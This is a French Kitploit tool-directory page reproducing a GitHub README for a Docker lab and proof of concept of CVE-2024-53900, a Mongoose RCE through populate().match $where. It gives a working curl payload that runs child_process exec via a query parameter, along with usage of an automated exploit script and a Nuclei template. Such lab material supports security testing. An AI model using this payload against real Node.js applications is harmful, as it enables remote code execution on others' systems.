Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-53900 — Environnement reproductible et PoC pour CVE-2024-53900, une RCE critique dans Mongoose via populate().match $where. Inclut un script d'exploitation automatisé et un modèle Nuclei pour les tests de sécurité. | Kitploit
Outils/GitHubGitHub/www-spam/cve-2024-53900
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubwww-spam/cve-2024-53900

CVE-2024-53900

Environnement reproductible et PoC pour CVE-2024-53900, une RCE critique dans Mongoose via populate().match $where. Inclut un script d'exploitation automatisé et un modèle Nuclei pour les tests de sécurité.

Voir le dépôt
il y a 0 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-53900 - Mongoose populate().match $where RCE

Ce dépôt fournit un environnement vulnérable reproductible et un PoC pour CVE-2024-53900, une vulnérabilité critique d'exécution de code à distance (RCE) dans Mongoose < 8.8.3.


📌 Détails de la vulnérabilité

  • CVE: CVE-2024-53900
  • Versions concernées: Mongoose < 8.8.3
  • Sévérité: Critique (CVSS 9.1)
  • Vecteur: populate().match combiné avec $where
  • Impact: Exécution arbitraire de JavaScript (RCE) dans le contexte Node.js

Références:

  • Avis GitHub
  • Commit de correctif

🛠️ Instructions de configuration

1. Cloner le dépôt

root@kitploit:~
git clone https://github.com/www-spam/CVE-2024-53900.git
cd CVE-2024-53900

2. Lancer l'environnement (Docker Compose)

root@kitploit:~
docker-compose up -d

📌 PoC GUI (Calculatrice)

Par défaut, l'application Node.js vulnérable s'exécute dans Docker.
Cependant, les applications graphiques (comme xcalc ou gnome-calculator) ne se lanceront pas dans un conteneur.

👉 Si vous souhaitez démontrer la RCE en lançant une fenêtre de calculatrice :

  1. Exécutez MongoDB dans Docker (comme backend de base de données)

    root@kitploit:~
    docker run -d --name mongo -p 27017:27017 mongo:6
    
  2. Exécutez l'application Node.js vulnérable localement

root@kitploit:~
   cd ~/cve-2024/app
   npm install
   node server.js
  • MongoDB tourne sur le port 27017
  • L'application Node.js vulnérable tourne sur le port 5000

📂 Structure du répertoire

root@kitploit:~
/home/kali/cve-2024/
├── docker-compose.yml     # Environment setup
├── exploit.py             # Automated exploit script
├── CVE-2024-53900.yaml    # Nuclei template
├── README.md              # Documentation
├── app/                   # Vulnerable Node.js app
│   ├── Dockerfile
│   ├── package.json
│   ├── server.js
│   ├── models.js
│   └── views/
└── data/                  # MongoDB volume

🚀 Exploitation

Test manuel

root@kitploit:~
curl "http://localhost:5000/book/{OBJECT_ID}/detail?view[path]=author&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('xcalc')"

PoC automatisé

root@kitploit:~
python3 exploit.py --url http://localhost:5000

Avec Nuclei

root@kitploit:~
nuclei \ -u http://localhost:5000/book/{{OBJECT_ID}/detail \ -t ~/.local/nuclei-templates/CVE-2024-53900.yaml \ -var pfield=author
image

🔒 Notes de sécurité

  • Pour la recherche et les tests uniquement (pas en production).
  • Charge utile limitée à des opérations sûres (par exemple, création de fichiers).
  • Entièrement isolé via Docker.

✅ Environnement testé

  • OS: Kali Linux
  • MongoDB: mongo:6
  • Node.js: 18
  • Mongoose: 8.5.0 (vulnérable)
  • Express: 4.18.2

📸 Démo

Image
Télécharger l’outil